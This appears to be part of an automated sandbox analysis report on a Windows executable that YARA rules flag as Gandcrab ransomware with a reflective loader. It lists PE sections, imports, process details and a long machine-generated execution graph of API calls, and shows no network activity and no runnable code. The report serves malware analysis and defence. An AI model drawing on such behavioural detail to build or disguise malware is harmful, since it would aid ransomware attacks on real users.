                    .data0x130000x161c40x14400False0.47274064429012347data6.3863967246134115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .reloc0x2a0000x11200x1200False0.7840711805555556data6.544131886571421IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    DLLImport
                    KERNEL32.dllGetCurrentProcess, WaitForSingleObject, OpenProcess, Sleep, GetModuleFileNameW, CreateFileW, ExitThread, GetLastError, GetProcAddress, ExitProcess, GetModuleHandleA, CloseHandle, GetCurrentProcessId, GetVersionExW, LoadLibraryA, lstrlenW, TerminateThread, CreateThread, WriteConsoleW, SetFilePointerEx, VirtualProtect, IsWow64Process, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetCommandLineA, SetLastError, GetCurrentThreadId, EncodePointer, DecodePointer, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, WriteFile, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, IsDebuggerPresent, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, EnterCriticalSection, LeaveCriticalSection, HeapFree, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, LoadLibraryExW, OutputDebugStringW, HeapAlloc, HeapReAlloc, GetStringTypeW, HeapSize, LCMapStringW
                    USER32.dllSetFocus, SendMessageW, CharUpperBuffW, GetForegroundWindow, GetSystemMetrics, GetMessageW, TranslateMessage, DispatchMessageW, SetForegroundWindow, DefWindowProcW, RegisterClassExW, CreateWindowExW, DestroyWindow, ShowWindow, keybd_event, UpdateWindow, SetWindowTextW, GetWindowLongW, SetWindowLongW, SystemParametersInfoW, GetAncestor
                    ntdll.dllRtlUnwind
                    No network behavior found

                    Target ID:0
                    Start time:23:59:22
                    Start date:31/08/2022
                    Path:C:\Users\user\Desktop\vy3mvlAaCZ.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\vy3mvlAaCZ.exe"
                    Imagebase:0x930000
                    File size:159232 bytes
                    MD5 hash:1873A210D41ACDEF243E921F3810803A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.256875847.0000000000943000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.256875847.0000000000943000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.260275699.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.260275699.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low

                    Target ID:3
                    Start time:23:59:24
                    Start date:31/08/2022
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 244
                    Imagebase:0x970000
                    File size:434592 bytes
                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                      Execution Graph

                      Execution Coverage:0.6%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.6%
                      Total number of Nodes:1815
                      Total number of Limit Nodes:10
_free 58 API calls 6532->6533 6534 9355c6 6533->6534 6535 93354d _free 58 API calls 6534->6535 6536 9355d1 6535->6536 6537 93354d _free 58 API calls 6536->6537 6538 9355dc 6537->6538 6539 93354d _free 58 API calls 6538->6539 6540 9355ea 6539->6540 6541 93354d _free 58 API calls 6540->6541 6542 9355f5 6541->6542 6543 93354d _free 58 API calls 6542->6543 6544 935600 6543->6544 6545 93354d _free 58 API calls 6544->6545 6546 93560b 6545->6546 6547 93354d _free 58 API calls 6546->6547 6548 935616 6547->6548 6549 93354d _free 58 API calls 6548->6549 6550 935621 6549->6550 6551 93354d _free 58 API calls 6550->6551 6552 93562c 6551->6552 6553 93354d _free 58 API calls 6552->6553 6554 935637 6553->6554 6555 93354d _free 58 API calls 6554->6555 6556 935642 6555->6556 6557 93354d _free 58 API calls 6556->6557 6558 93564d 6557->6558 6559 93354d _free 58 API calls 6558->6559 6560 935658 6559->6560 6561 93354d _free 58 API calls 6560->6561 6562 935663 6561->6562 6563 93354d _free 58 API calls 6562->6563 6564 93566e 6563->6564 6565 93354d _free 58 API calls 6564->6565 6566 935679 6565->6566 6567 93354d _free 58 API calls 6566->6567 6568 935684 6567->6568 6569 93354d _free 58 API calls 6568->6569 6570 93568f 6569->6570 6571 93354d _free 58 API calls 6570->6571 6572 93569d 6571->6572 6573 93354d _free 58 API calls 6572->6573 6574 9356a8 6573->6574 6575 93354d _free 58 API calls 6574->6575 6576 9356b3 6575->6576 6577 93354d _free 58 API calls 6576->6577 6578 9356be 6577->6578 6579 93354d _free 58 API calls 6578->6579 6580 9356c9 6579->6580 6581 93354d _free 58 API calls 6580->6581 6582 9356d4 6581->6582 6583 93354d _free 58 API calls 6582->6583 6583->6409 6584->6337 6590 933b9d 6585->6590 6594 933c47 6585->6594 6587 93161c __setmbcp_nolock 6 API calls 6589 933cf3 6587->6589 6589->6293 6595 935a45 6590->6595 6593 9358e9 ___crtLCMapStringA 62 API calls 6593->6594 6594->6587 6596 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 6595->6596 6597 935a56 6596->6597 6605 93594d 6597->6605 
6600 9358e9 6601 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 6600->6601 6602 9358fa 6601->6602 6622 9356e5 6602->6622 6606 935967 6605->6606 6607 935974 MultiByteToWideChar 6605->6607 6606->6607 6610 9359a0 6607->6610 6617 935999 6607->6617 6608 93161c __setmbcp_nolock 6 API calls 6609 933bfe 6608->6609 6609->6600 6611 9359c2 _memset __alloca_probe_16 6610->6611 6612 93504b __crtLCMapStringA_stat 58 API calls 6610->6612 6613 9359fe MultiByteToWideChar 6611->6613 6611->6617 6612->6611 6614 935a28 6613->6614 6615 935a18 GetStringTypeW 6613->6615 6618 93592f 6614->6618 6615->6614 6617->6608 6619 93594a 6618->6619 6620 935939 6618->6620 6619->6617 6620->6619 6621 93354d _free 58 API calls 6620->6621 6621->6619 6624 9356fe MultiByteToWideChar 6622->6624 6625 93575d 6624->6625 6629 935764 6624->6629 6626 93161c __setmbcp_nolock 6 API calls 6625->6626 6627 933c1f 6626->6627 6627->6593 6628 9357c3 MultiByteToWideChar 6630 9357dc 6628->6630 6646 93582a 6628->6646 6631 93504b __crtLCMapStringA_stat 58 API calls 6629->6631 6634 93578c __alloca_probe_16 6629->6634 6647 935bd2 6630->6647 6631->6634 6633 93592f __freea 58 API calls 6633->6625 6634->6625 6634->6628 6635 9357f0 6636 935806 6635->6636 6638 935832 6635->6638 6635->6646 6637 935bd2 __crtLCMapStringA_stat LCMapStringW 6636->6637 6636->6646 6637->6646 6640 93585a __alloca_probe_16 6638->6640 6641 93504b __crtLCMapStringA_stat 58 API calls 6638->6641 6639 935bd2 __crtLCMapStringA_stat LCMapStringW 6643 93589d 6639->6643 6640->6639 6640->6646 6641->6640 6642 9358c5 6644 93592f __freea 58 API calls 6642->6644 6643->6642 6645 9358b7 WideCharToMultiByte 6643->6645 6644->6646 6645->6642 6646->6633 6648 935be2 6647->6648 6649 935bfd __crtLCMapStringA_stat 6647->6649 6648->6635 6650 935c14 LCMapStringW 6649->6650 6650->6635 6651->6303 6655 934b22 6652->6655 6656 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 6655->6656 6657 934b34 6656->6657 6657->6238 6661 931efe 6658->6661 6660 931da4 6662 931f0a __initptd 6661->6662 
6663 9333ce __lock 51 API calls 6662->6663 6664 931f11 6663->6664 6665 931f3f DecodePointer 6664->6665 6668 931fca __cinit 6664->6668 6667 931f56 DecodePointer 6665->6667 6665->6668 6674 931f66 6667->6674 6681 932018 6668->6681 6670 932027 __initptd 6670->6660 6672 931f73 EncodePointer 6672->6674 6673 93200f 6675 931d73 _doexit 3 API calls 6673->6675 6674->6668 6674->6672 6676 931f83 DecodePointer EncodePointer 6674->6676 6677 932018 6675->6677 6679 931f95 DecodePointer DecodePointer 6676->6679 6678 932025 6677->6678 6686 933538 LeaveCriticalSection 6677->6686 6678->6660 6679->6674 6682 931ff8 6681->6682 6683 93201e 6681->6683 6682->6670 6685 933538 LeaveCriticalSection 6682->6685 6687 933538 LeaveCriticalSection 6683->6687 6685->6673 6686->6678 6687->6682 6689 934bab 6688->6689 6690 934b9d 6688->6690 6691 9342fc __cftoe2_l 58 API calls 6689->6691 6690->6689 6693 934bc1 6690->6693 6696 934bb2 6691->6696 6692 93428d __cftoe2_l 9 API calls 6694 934bbc 6692->6694 6693->6694 6695 9342fc __cftoe2_l 58 API calls 6693->6695 6694->5919 6695->6696 6696->6692 6698 9345d4 EncodePointer 6697->6698 6698->6698 6699 9345ee 6698->6699 6699->5926 6703 9344c0 6700->6703 6702 9345c7 6702->5928 6704 9344cc __initptd 6703->6704 6711 931eeb 6704->6711 6710 9344f3 __initptd 6710->6702 6712 9333ce __lock 58 API calls 6711->6712 6713 931ef2 6712->6713 6714 934504 DecodePointer DecodePointer 6713->6714 6715 9344e1 6714->6715 6716 934531 6714->6716 6725 9344fe 6715->6725 6716->6715 6728 935b20 6716->6728 6718 934594 EncodePointer EncodePointer 6718->6715 6719 934543 6719->6718 6720 934568 6719->6720 6735 933614 6719->6735 6720->6715 6722 933614 __realloc_crt 61 API calls 6720->6722 6724 934582 EncodePointer 6720->6724 6723 93457c 6722->6723 6723->6715 6723->6724 6724->6718 6762 931ef4 6725->6762 6729 935b29 6728->6729 6730 935b3e HeapSize 6728->6730 6731 9342fc __cftoe2_l 58 API calls 6729->6731 6730->6719 6732 935b2e 6731->6732 6733 93428d __cftoe2_l 9 API calls 6732->6733 6734 935b39 
6733->6734 6734->6719 6739 93361b 6735->6739 6737 933658 6737->6720 6739->6737 6740 9350dd 6739->6740 6761 933395 Sleep 6739->6761 6741 9350f1 6740->6741 6742 9350e6 6740->6742 6744 9350f9 6741->6744 6752 935106 6741->6752 6743 93504b __crtLCMapStringA_stat 58 API calls 6742->6743 6745 9350ee 6743->6745 6746 93354d _free 58 API calls 6744->6746 6745->6739 6758 935101 __dosmaperr 6746->6758 6747 93513e 6749 9345f0 __calloc_impl DecodePointer 6747->6749 6748 93510e HeapReAlloc 6748->6752 6748->6758 6750 935144 6749->6750 6753 9342fc __cftoe2_l 58 API calls 6750->6753 6751 93516e 6755 9342fc __cftoe2_l 58 API calls 6751->6755 6752->6747 6752->6748 6752->6751 6754 9345f0 __calloc_impl DecodePointer 6752->6754 6757 935156 6752->6757 6753->6758 6754->6752 6756 935173 GetLastError 6755->6756 6756->6758 6759 9342fc __cftoe2_l 58 API calls 6757->6759 6758->6739 6760 93515b GetLastError 6759->6760 6760->6758 6761->6739 6765 933538 LeaveCriticalSection 6762->6765 6764 931efb 6764->6710 6765->6764 6767 931374 GetLastError 6766->6767 6768 9313d3 6766->6768 6767->6768 6769 93137f CharUpperBuffW 6767->6769 6770 93161c __setmbcp_nolock 6 API calls 6768->6770 6769->6768 6771 931391 6769->6771 6772 9313f1 OpenProcess GetLastError 6770->6772 6771->6768 6773 9313a6 GetCurrentProcess IsWow64Process 6771->6773 6772->5932 6772->5933 6774 9313d5 GetCurrentProcessId 6773->6774 6775 9313be 6773->6775 6809 93ba30 Sleep GetModuleHandleA LoadLibraryA 6774->6809 6775->6774 6777 9313c7 GetCurrentProcessId 6775->6777 6787 93ca30 Sleep GetModuleHandleA LoadLibraryA 6777->6787 6780 93124f 6779->6780 6781 9312b6 6780->6781 6782 931266 VirtualProtect 6780->6782 6889 93d9b8 6781->6889 6782->6781 6786 931286 VirtualProtect 6782->6786 6786->6781 6788 93ca7a 6787->6788 6789 93ca8e GetVersionExW 6787->6789 6790 93161c __setmbcp_nolock 6 API calls 6788->6790 6791 93cc21 RegisterClassExW 6789->6791 6792 93cab5 6789->6792 6794 93ca88 6790->6794 6791->6788 6793 93cc93 GetSystemMetrics GetSystemMetrics 
CreateThread 6791->6793 6795 93cadf GetModuleHandleA 6792->6795 6799 93cac7 6792->6799 6796 93cd21 6793->6796 6797 93ccc7 6793->6797 6794->6768 6798 93cb56 IsWow64Process 6795->6798 6795->6799 6801 93161c __setmbcp_nolock 6 API calls 6796->6801 6800 93ccfa TerminateThread Sleep keybd_event keybd_event 6797->6800 6804 93ccec Sleep 6797->6804 6798->6788 6802 93cb6d 6798->6802 6799->6788 6799->6798 6800->6796 6803 93cd33 6801->6803 6802->6788 6835 93cfd0 CreateWindowExW 6802->6835 6803->6768 6804->6797 6804->6800 6806 93cbcd 6845 93cd40 RegisterClassExW 6806->6845 6808 93cbd7 6808->6788 6808->6791 6810 93ba7a 6809->6810 6811 93ba8e GetVersionExW 6809->6811 6812 93161c __setmbcp_nolock 6 API calls 6810->6812 6813 93bab5 6811->6813 6814 93bc59 RegisterClassExW 6811->6814 6815 93ba88 6812->6815 6817 93bae4 GetModuleHandleA 6813->6817 6825 93bac7 6813->6825 6814->6810 6816 93bccb GetSystemMetrics GetSystemMetrics CreateThread 6814->6816 6815->6768 6818 93bd60 6816->6818 6822 93bcff 6816->6822 6819 93bb5b IsWow64Process 6817->6819 6817->6825 6823 93161c __setmbcp_nolock 6 API calls 6818->6823 6819->6810 6820 93bb72 6819->6820 6820->6810 6865 93bf60 CreateWindowExW 6820->6865 6821 93bd39 TerminateThread Sleep keybd_event keybd_event 6821->6818 6822->6821 6828 93bd2b Sleep 6822->6828 6824 93bd72 6823->6824 6824->6768 6825->6810 6825->6819 6827 93bbc8 6875 93bd80 RegisterClassExW 6827->6875 6828->6821 6828->6822 6830 93bbd2 6830->6810 6831 93bbf5 GetModuleHandleA 6830->6831 6832 93bc09 6830->6832 6831->6832 6833 93bc00 6831->6833 6832->6833 6834 93bc12 GetModuleHandleA 6832->6834 6833->6814 6834->6833 6836 93cff5 6835->6836 6837 93d03c 6835->6837 6859 93c750 6836->6859 6837->6806 6840 93d002 SetWindowLongW 6842 93d010 6840->6842 6841 93d034 DestroyWindow 6841->6837 6843 93d031 6842->6843 6844 93d022 DestroyWindow 6842->6844 6843->6841 6844->6806 6846 93cda1 6845->6846 6847 93cda8 CreateWindowExW 6845->6847 6846->6808 6848 93ce95 6847->6848 6849 93cddb RegisterClassExW 
6847->6849 6848->6808 6849->6848 6850 93cdf8 CreateWindowExW 6849->6850 6850->6848 6851 93ce1f 6850->6851 6852 93c750 2 API calls 6851->6852 6853 93ce25 6852->6853 6854 93c750 2 API calls 6853->6854 6855 93ce2d 6854->6855 6855->6848 6856 93ce7f DestroyWindow DestroyWindow 6855->6856 6857 93ce75 6855->6857 6858 93ce5f DestroyWindow DestroyWindow 6855->6858 6856->6808 6857->6856 6858->6808 6860 93c761 6859->6860 6861 93c75c 6859->6861 6860->6840 6860->6841 6863 93c790 LoadLibraryA GetProcAddress 6861->6863 6864 93c7b0 6863->6864 6864->6860 6866 93bf85 6865->6866 6867 93bfcc 6865->6867 6868 93c750 2 API calls 6866->6868 6867->6827 6869 93bf8c 6868->6869 6870 93bf92 SetWindowLongW 6869->6870 6871 93bfc4 DestroyWindow 6869->6871 6872 93bfa0 6870->6872 6871->6867 6873 93bfc1 6872->6873 6874 93bfb2 DestroyWindow 6872->6874 6873->6871 6874->6827 6876 93bde1 6875->6876 6877 93bde8 CreateWindowExW 6875->6877 6876->6830 6878 93bed5 6877->6878 6879 93be1b RegisterClassExW 6877->6879 6878->6830 6879->6878 6880 93be38 CreateWindowExW 6879->6880 6880->6878 6881 93be5f 6880->6881 6882 93c750 2 API calls 6881->6882 6883 93be65 6882->6883 6884 93c750 2 API calls 6883->6884 6885 93be6d 6884->6885 6885->6878 6886 93bebf DestroyWindow DestroyWindow 6885->6886 6887 93beb5 6885->6887 6888 93be9f DestroyWindow DestroyWindow 6885->6888 6886->6830 6887->6886 6888->6830 6890 93161c __setmbcp_nolock 6 API calls 6889->6890 6891 93d9c2 6890->6891 6891->6891 7114 937b14 7115 937b1c __cfltcvt_init 7114->7115 7116 937b27 7115->7116 7118 9398ba 7115->7118 7124 93a73f 7118->7124 7120 9398cd 7121 9398d4 7120->7121 7122 93429d __invoke_watson 8 API calls 7120->7122 7121->7116 7123 9398e0 7122->7123 7125 93a77b __control87 7124->7125 7127 93a75b __control87 7124->7127 7125->7120 7126 9342fc __cftoe2_l 58 API calls 7128 93a771 7126->7128 7127->7126 7129 93428d __cftoe2_l 9 API calls 7128->7129 7129->7125 7130 939799 7133 9397b1 7130->7133 7134 9397c2 7133->7134 7135 9397db 7133->7135 7139 937a39 
7134->7139 7148 937ac7 7135->7148 7138 9397ac 7140 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7139->7140 7141 937a5d 7140->7141 7151 938674 7141->7151 7146 93161c __setmbcp_nolock 6 API calls 7147 937ac3 7146->7147 7147->7138 7163 937995 7148->7163 7152 9386bc 7151->7152 7158 9386cc ___mtold12 7151->7158 7153 9342fc __cftoe2_l 58 API calls 7152->7153 7154 9386c1 7153->7154 7155 93428d __cftoe2_l 9 API calls 7154->7155 7155->7158 7156 93161c __setmbcp_nolock 6 API calls 7157 937a75 7156->7157 7159 937b90 7157->7159 7158->7156 7162 937be8 7159->7162 7160 93161c __setmbcp_nolock 6 API calls 7161 937a82 7160->7161 7161->7146 7162->7160 7164 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7163->7164 7165 9379c2 7164->7165 7166 938674 ___strgtold12_l 58 API calls 7165->7166 7167 9379da 7166->7167 7172 938102 7167->7172 7170 93161c __setmbcp_nolock 6 API calls 7171 937a35 7170->7171 7171->7138 7175 93815a 7172->7175 7173 93161c __setmbcp_nolock 6 API calls 7174 9379f7 7173->7174 7174->7170 7175->7173 7176 938e1c 7179 938e3d 7176->7179 7178 938e38 7180 938ea7 7179->7180 7181 938e48 7179->7181 7247 93938e 7180->7247 7181->7180 7183 938e4d 7181->7183 7185 938e52 7183->7185 7186 938e6b 7183->7186 7184 938e8c 7184->7178 7193 939548 7185->7193 7188 938e8e 7186->7188 7190 938e75 7186->7190 7234 938ec3 7188->7234 7212 939609 7190->7212 7264 93a5af 7193->7264 7196 93958d 7199 9395a5 7196->7199 7200 939595 7196->7200 7197 93957d 7198 9342fc __cftoe2_l 58 API calls 7197->7198 7201 939582 7198->7201 7276 93a437 7199->7276 7202 9342fc __cftoe2_l 58 API calls 7200->7202 7204 93428d __cftoe2_l 9 API calls 7201->7204 7205 93959a 7202->7205 7208 939589 7204->7208 7207 93428d __cftoe2_l 9 API calls 7205->7207 7206 9395d8 7206->7208 7285 93945c 7206->7285 7207->7208 7210 93161c __setmbcp_nolock 6 API calls 7208->7210 7211 938e66 7210->7211 7211->7178 7213 93a5af __fltout2 58 API calls 7212->7213 7214 939637 7213->7214 7215 939651 7214->7215 7216 93963e 7214->7216 7218 939659 
7215->7218 7219 93966c 7215->7219 7217 9342fc __cftoe2_l 58 API calls 7216->7217 7220 939643 7217->7220 7221 9342fc __cftoe2_l 58 API calls 7218->7221 7222 93a437 __fptostr 58 API calls 7219->7222 7223 93428d __cftoe2_l 9 API calls 7220->7223 7224 93965e 7221->7224 7225 939698 7222->7225 7226 93964a 7223->7226 7227 93428d __cftoe2_l 9 API calls 7224->7227 7225->7226 7229 9396de 7225->7229 7232 9396b8 7225->7232 7228 93161c __setmbcp_nolock 6 API calls 7226->7228 7227->7226 7230 939704 7228->7230 7305 93923d 7229->7305 7230->7184 7233 93945c __cftof2_l 58 API calls 7232->7233 7233->7226 7235 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7234->7235 7236 938ee8 7235->7236 7237 938eff 7236->7237 7238 938f08 7236->7238 7239 9342fc __cftoe2_l 58 API calls 7237->7239 7241 938f11 7238->7241 7244 938f25 7238->7244 7240 938f04 7239->7240 7243 93428d __cftoe2_l 9 API calls 7240->7243 7242 9342fc __cftoe2_l 58 API calls 7241->7242 7242->7240 7246 938f20 _memset __alldvrm __cftoa_l _strrchr 7243->7246 7244->7246 7337 93921f 7244->7337 7246->7184 7248 93a5af __fltout2 58 API calls 7247->7248 7249 9393c0 7248->7249 7250 9393d7 7249->7250 7251 9393c7 7249->7251 7253 9393e8 7250->7253 7254 9393de 7250->7254 7252 9342fc __cftoe2_l 58 API calls 7251->7252 7255 9393cc 7252->7255 7257 93a437 __fptostr 58 API calls 7253->7257 7256 9342fc __cftoe2_l 58 API calls 7254->7256 7258 93428d __cftoe2_l 9 API calls 7255->7258 7256->7255 7259 939428 7257->7259 7263 9393d3 7258->7263 7261 93923d __cftoe2_l 58 API calls 7259->7261 7259->7263 7260 93161c __setmbcp_nolock 6 API calls 7262 939458 7260->7262 7261->7263 7262->7184 7263->7260 7265 93a5d8 ___dtold 7264->7265 7292 93a84d 7265->7292 7268 934b92 __cftoe2_l 58 API calls 7269 93a613 7268->7269 7270 93a630 7269->7270 7271 93a61a 7269->7271 7272 93429d __invoke_watson 8 API calls 7270->7272 7273 93161c __setmbcp_nolock 6 API calls 7271->7273 7275 93a63c 7272->7275 7274 939576 7273->7274 7274->7196 7274->7197 7277 93a449 7276->7277 7278 93a45f 
7276->7278 7279 9342fc __cftoe2_l 58 API calls 7277->7279 7278->7277 7281 93a465 7278->7281 7280 93a44e 7279->7280 7282 93428d __cftoe2_l 9 API calls 7280->7282 7283 9342fc __cftoe2_l 58 API calls 7281->7283 7284 93a458 _memmove _strlen 7281->7284 7282->7284 7283->7280 7284->7206 7286 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7285->7286 7287 939479 7286->7287 7288 9342fc __cftoe2_l 58 API calls 7287->7288 7291 939495 _memset __shift 7287->7291 7289 93948b 7288->7289 7290 93428d __cftoe2_l 9 API calls 7289->7290 7290->7291 7291->7208 7294 93a8a2 7292->7294 7293 93a914 7296 934b92 __cftoe2_l 58 API calls 7293->7296 7294->7293 7298 93a92d 7294->7298 7304 93a8b4 7294->7304 7295 93161c __setmbcp_nolock 6 API calls 7297 93a5f3 7295->7297 7296->7304 7297->7268 7300 934b92 __cftoe2_l 58 API calls 7298->7300 7299 93b1e9 7301 93429d __invoke_watson 8 API calls 7299->7301 7300->7304 7302 93b220 7301->7302 7303 93a8c5 7303->7295 7304->7299 7304->7303 7306 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7305->7306 7307 939250 7306->7307 7308 93925d 7307->7308 7309 939266 7307->7309 7310 9342fc __cftoe2_l 58 API calls 7308->7310 7312 93927b 7309->7312 7315 93928f __shift 7309->7315 7311 939262 7310->7311 7314 93428d __cftoe2_l 9 API calls 7311->7314 7313 9342fc __cftoe2_l 58 API calls 7312->7313 7313->7311 7318 93928a _memmove 7314->7318 7316 934b92 __cftoe2_l 58 API calls 7315->7316 7317 939306 7316->7317 7317->7318 7319 93429d __invoke_watson 8 API calls 7317->7319 7318->7226 7320 93938d 7319->7320 7321 93a5af __fltout2 58 API calls 7320->7321 7322 9393c0 7321->7322 7323 9393d7 7322->7323 7324 9393c7 7322->7324 7326 9393e8 7323->7326 7327 9393de 7323->7327 7325 9342fc __cftoe2_l 58 API calls 7324->7325 7328 9393cc 7325->7328 7330 93a437 __fptostr 58 API calls 7326->7330 7329 9342fc __cftoe2_l 58 API calls 7327->7329 7331 93428d __cftoe2_l 9 API calls 7328->7331 7329->7328 7332 939428 7330->7332 7333 9393d3 7331->7333 7332->7333 7335 93923d __cftoe2_l 58 API calls 
7332->7335 7334 93161c __setmbcp_nolock 6 API calls 7333->7334 7336 939458 7334->7336 7335->7333 7336->7226 7338 93938e __cftoe_l 58 API calls 7337->7338 7339 939238 7338->7339 7339->7246 7340 932d1c IsProcessorFeaturePresent 7341 932d42 7340->7341 7799 9315c2 7800 9315d1 7799->7800 7801 9315d7 7799->7801 7803 931e47 _raise 58 API calls 7800->7803 7804 9315dc __initptd 7801->7804 7805 931da5 7801->7805 7803->7801 7806 931efe _doexit 58 API calls 7805->7806 7807 931db0 7806->7807 7807->7804 7808 9312c6 7809 9312d2 7808->7809 7810 93d9b8 6 API calls 7809->7810 7811 9312d7 7810->7811 7812 9366c4 7814 9366d0 __initptd 7812->7814 7813 936707 __initptd 7814->7813 7815 9333ce __lock 58 API calls 7814->7815 7816 9366e4 7815->7816 7817 93396d __updatetlocinfoEx_nolock 58 API calls 7816->7817 7818 9366f4 7817->7818 7820 93670d 7818->7820 7823 933538 LeaveCriticalSection 7820->7823 7822 936714 7822->7813 7823->7822 7342 93d388 7344 93d390 7342->7344 7343 93c750 LoadLibraryA GetProcAddress 7343->7344 7344->7343 7345 93d4d7 7344->7345 7346 93d4fd DestroyWindow 7345->7346 7357 93d509 7345->7357 7346->7345 7347 93d70e 7348 93161c __setmbcp_nolock 6 API calls 7347->7348 7349 93d736 7348->7349 7350 93d57c CreateThread 7350->7357 7351 93d59c Sleep 7351->7357 7352 93d5af CreateWindowExW 7354 93d5f6 GetWindowLongW SetWindowLongW 7352->7354 7355 93d688 DestroyWindow DestroyWindow TerminateThread WaitForSingleObject 7352->7355 7353 93d6dd DestroyWindow DestroyWindow TerminateThread 7353->7357 7356 9310c5 7354->7356 7355->7357 7358 93d650 keybd_event keybd_event keybd_event keybd_event Sleep 7356->7358 7357->7347 7357->7350 7357->7351 7357->7352 7357->7353 7359 93c820 15 API calls 7357->7359 7358->7355 7359->7357 7824 9397f3 7827 939804 7824->7827 7828 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7827->7828 7829 939816 7828->7829 7836 939c81 7829->7836 7831 939822 7832 939836 7831->7832 7841 939b13 7831->7841 7834 939c81 __forcdecpt_l 65 API calls 7832->7834 7835 939800 7834->7835 
7837 939c9f 7836->7837 7838 939c8d 7836->7838 7846 939b3e 7837->7846 7838->7831 7842 939b30 7841->7842 7843 939b1f 7841->7843 7865 939ac1 7842->7865 7843->7831 7847 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7846->7847 7848 939b51 7847->7848 7849 939bbd 7848->7849 7850 939b5d 7848->7850 7851 939bdb 7849->7851 7853 93750c __isleadbyte_l 58 API calls 7849->7853 7852 939b72 7850->7852 7858 93a79c 7850->7858 7854 9342fc __cftoe2_l 58 API calls 7851->7854 7856 939be1 7851->7856 7852->7831 7853->7851 7854->7856 7857 9358e9 ___crtLCMapStringA 62 API calls 7856->7857 7857->7852 7859 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7858->7859 7860 93a7ae 7859->7860 7861 93a7bb 7860->7861 7862 93750c __isleadbyte_l 58 API calls 7860->7862 7861->7852 7863 93a7df 7862->7863 7864 935a45 ___crtGetStringTypeA 61 API calls 7863->7864 7864->7861 7866 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7865->7866 7867 939ad2 7866->7867 7868 939ae9 7867->7868 7869 93a79c __isctype_l 61 API calls 7867->7869 7868->7831 7869->7868 7366 9349b2 7367 9349bf 7366->7367 7368 933585 __calloc_crt 58 API calls 7367->7368 7369 9349d9 7368->7369 7370 9349f2 7369->7370 7371 933585 __calloc_crt 58 API calls 7369->7371 7371->7370 7870 9364f0 RtlUnwind 7871 9348f0 7872 934902 7871->7872 7874 934910 @_EH4_CallFilterFunc@8 7871->7874 7873 93161c __setmbcp_nolock 6 API calls 7872->7873 7873->7874 7875 93b970 CreateWindowExW 7876 93ba2a 7875->7876 7877 93b9b9 7875->7877 7884 93bfe0 GetForegroundWindow 7877->7884 7880 93ba23 7881 93b9f0 7882 93ba00 TranslateMessage DispatchMessageW GetMessageW 7881->7882 7882->7882 7883 93ba1c 7882->7883 7885 93b9c5 Sleep GetMessageW 7884->7885 7886 93bff8 SystemParametersInfoW 7884->7886 7885->7880 7885->7881 7887 93c01b 7886->7887 7888 93c03e SendMessageW SendMessageW 7886->7888 7887->7888 7890 93c022 SystemParametersInfoW 7887->7890 7888->7885 7889 93c066 SystemParametersInfoW 7888->7889 7889->7885 7890->7888 7891 93c970 CreateWindowExW 7892 93ca2a 7891->7892 7893 
